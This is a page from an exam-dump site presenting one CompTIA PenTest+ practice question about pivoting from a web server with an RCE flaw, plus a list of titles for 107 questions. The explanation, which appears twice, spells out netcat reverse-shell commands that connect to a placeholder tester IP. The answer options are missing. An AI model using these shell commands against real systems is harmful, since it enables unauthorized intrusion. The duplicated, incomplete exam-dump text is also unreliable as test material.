Valid PT0-003 Dumps shared by ExamDiscuss.com for Helping Passing PT0-003 Exam! ExamDiscuss.com now offer the newest PT0-003 exam dumps, the ExamDiscuss.com PT0-003 exam questions have been updated and answers have been corrected get the newest ExamDiscuss.com PT0-003 dumps with Test Engine here:
Access PT0-003 Dumps Premium Version
(274 Q&As Dumps, 35%OFF Special Discount Code: freecram)
<< Prev Question Next Question >>
Question 81/107
A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?
Correct Answer: D
The tester needs to pivot from the compromised web server while bypassing firewall restrictions that allow:
Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
Unrestricted outbound traffic
Reverse shell using TCP 443 (Option D):
This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall.
Example:
/bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh'
The pentester listens on TCP 443 and receives the shell from the target.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide - "Pivoting and Network Tunneling Techniques" Incorrect options:
Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.
Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.
Option C (nc -e /bin/sh <pentester_ip> 53): TCP 53 is inbound only, meaning this connection will be blocked.
Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
Unrestricted outbound traffic
Reverse shell using TCP 443 (Option D):
This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall.
Example:
/bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh'
The pentester listens on TCP 443 and receives the shell from the target.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide - "Pivoting and Network Tunneling Techniques" Incorrect options:
Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.
Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.
Option C (nc -e /bin/sh <pentester_ip> 53): TCP 53 is inbound only, meaning this connection will be blocked.
- Question List (107q)
- Question 1: A penetration tester successfully gained access to manage re...
- Question 2: During host discovery, a security analyst wants to obtain Ge...
- Question 3: A penetration tester needs to identify all vulnerable input ...
- Question 4: A penetration tester finds that an application responds with...
- Question 5: While performing a penetration test, a tester executes the f...
- Question 6: A penetration tester is performing an authorized physical as...
- Question 7: During a penetration testing engagement, a tester targets th...
- Question 8: A penetration tester needs to test a very large number of UR...
- Question 9: Which of the following elements of a penetration test report...
- Question 10: As part of an engagement, a penetration tester wants to main...
- Question 11: During a red-team exercise, a penetration tester obtains an ...
- Question 12: A tester is finishing an engagement and needs to ensure that...
- Question 13: Which of the following techniques is the best way to avoid d...
- Question 14: A penetration tester finishes a security scan and uncovers n...
- Question 15: A penetration tester creates a list of target domains that r...
- Question 16: During a penetration test, you gain access to a system with ...
- Question 17: A penetration tester wants to use PowerView in an AD environ...
- Question 18: A penetration tester is evaluating a SCADA system. The teste...
- Question 19: A penetration tester is compiling the final report for a rec...
- Question 20: During an engagement, a penetration tester runs the followin...
- Question 21: You are a penetration tester running port scans on a server....
- Question 22: A penetration tester obtains password dumps associated with ...
- Question 23: A penetration tester attempts to run an automated web applic...
- Question 24: A penetration tester launches an attack against company empl...
- Question 25: A penetration tester discovers evidence of an advanced persi...
- Question 26: A penetration tester identifies an exposed corporate directo...
- Question 27: A penetration tester writes the following script, which is d...
- Question 28: During a penetration test, the tester gains full access to t...
- Question 29: A company hires a penetration tester to perform an external ...
- Question 30: A penetration tester attempts unauthorized entry to the comp...
- Question 31: A penetration tester gains access to a Windows machine and w...
- Question 32: A penetration tester gains access to a host but does not hav...
- Question 33: You are a penetration tester reviewing a client's website th...
- Question 34: A penetration tester has discovered sensitive files on a sys...
- Question 35: A penetration tester writes the following script to enumerat...
- Question 36: Which of the following is the most efficient way to infiltra...
- Question 37: A penetration tester performs a service enumeration process ...
- Question 38: A penetration tester finds it is possible to downgrade a web...
- Question 39: A penetration tester has adversely affected a critical syste...
- Question 40: During an assessment, a penetration tester manages to get RD...
- Question 41: Which of the following is within the scope of proper handlin...
- Question 42: A penetration tester needs to evaluate the order in which th...
- Question 43: A penetration tester is conducting a wireless security asses...
- Question 44: A penetration tester observes the following output from an N...
- Question 45: While performing reconnaissance, a penetration tester attemp...
- Question 46: A penetration tester is attempting to exfiltrate sensitive d...
- Question 47: A penetration tester has been asked to conduct a blind web a...
- Question 48: The following file was obtained during reconnaissance: (Exhi...
- Question 49: During a security audit, a penetration tester wants to run a...
- Question 50: During a penetration test, a tester captures information abo...
- Question 51: A penetration tester wants to create a malicious QR code to ...
- Question 52: During an assessment, a penetration tester obtains a low-pri...
- Question 53: A penetration tester discovers data to stage and exfiltrate....
- Question 54: A tester completed a report for a new client. Prior to shari...
- Question 55: A penetration tester identifies the following open ports dur...
- Question 56: A tester plans to perform an attack technique over a comprom...
- Question 57: While conducting a peer review for a recent assessment, a pe...
- Question 58: A penetration tester plans to conduct reconnaissance during ...
- Question 59: During an engagement, a penetration tester wants to enumerat...
- Question 60: During a security assessment for an internal corporate netwo...
- Question 61: A penetration tester gains initial access to an endpoint and...
- Question 62: A penetration tester has found a web application that is run...
- Question 63: A penetration tester currently conducts phishing reconnaissa...
- Question 64: A penetration tester is enumerating a Linux system. The goal...
- Question 65: During an external penetration test, a tester receives the f...
- Question 66: A client warns the assessment team that an ICS application i...
- Question 67: A penetration tester established an initial compromise on a ...
- Question 68: Which of the following is most important when communicating ...
- Question 69: A penetration tester is researching a path to escalate privi...
- Question 70: A penetration tester completes a scan and sees the following...
- Question 71: As part of a security audit, a penetration tester finds an i...
- Question 72: A company hires a penetration tester to test the security im...
- Question 73: Which of the following post-exploitation activities allows a...
- Question 74: A penetration tester needs to launch an Nmap scan to find th...
- Question 75: A penetration tester cannot complete a full vulnerability sc...
- Question 76: Which of the following is the most efficient way to exfiltra...
- Question 77: During an assessment, a penetration tester obtains an NTLM h...
- Question 78: During an engagement, a penetration tester needs to break th...
- Question 79: A penetration tester reviews a SAST vulnerability scan repor...
- Question 80: A penetration tester is attempting to discover vulnerabiliti...
- Question 81: A penetration tester finds an unauthenticated RCE vulnerabil...
- Question 82: Which of the following activities should be performed to pre...
- Question 83: A penetration tester is performing network reconnaissance. T...
- Question 84: A penetration tester wants to use the following Bash script ...
- Question 85: While conducting an assessment, a penetration tester identif...
- Question 86: A penetration tester obtains the following output during an ...
- Question 87: A penetration tester wants to use multiple TTPs to assess th...
- Question 88: During a pre-engagement activity with a new customer, a pene...
- Question 89: During a penetration test, a tester compromises a Windows co...
- Question 90: After a recent penetration test was conducted by the company...
- Question 91: A penetration tester wants to send a specific network packet...
- Question 92: During a penetration test, a tester attempts to pivot from o...
- Question 93: A penetration tester needs to collect information over the n...
- Question 94: A penetration tester needs to use the native binaries on a s...
- Question 95: During a penetration test, a junior tester uses Hunter.io fo...
- Question 96: During an internal penetration test, a tester compromises a ...
- Question 97: A tester performs a vulnerability scan and identifies severa...
- Question 98: A penetration tester assesses an application allow list and ...
- Question 99: During a testing engagement, a penetration tester compromise...
- Question 100: A penetration tester is conducting reconnaissance for an upc...
- Question 101: A tester wants to pivot from a compromised host to another n...
- Question 102: A penetration tester downloads a JAR file that is used in an...
- Question 103: A penetration tester is getting ready to conduct a vulnerabi...
- Question 104: Which of the following are valid reasons for including base,...
- Question 105: In a cloud environment, a security team discovers that an at...
- Question 106: A penetration tester gains access to the target network and ...
- Question 107: A penetration testing team wants to conduct DNS lookups for ...
